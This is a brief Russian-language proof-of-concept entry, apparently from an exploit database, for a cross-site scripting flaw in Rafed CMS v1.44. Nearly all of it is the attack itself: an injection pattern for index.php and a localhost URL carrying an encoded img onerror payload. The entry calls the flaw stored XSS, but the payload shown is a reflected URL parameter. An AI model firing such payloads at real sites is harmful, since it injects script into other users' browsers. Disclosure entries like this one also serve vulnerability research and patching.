
PoC-эксплойт для хранимой XSS-уязвимости в Rafed CMS v1.44, демонстрирующий инъекцию через параметр index.php.
Rafed CMS Website v1.44 - Межсайтовый скриптинг (XSS)
index.php?">{XSS_Payload] в index.php
https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E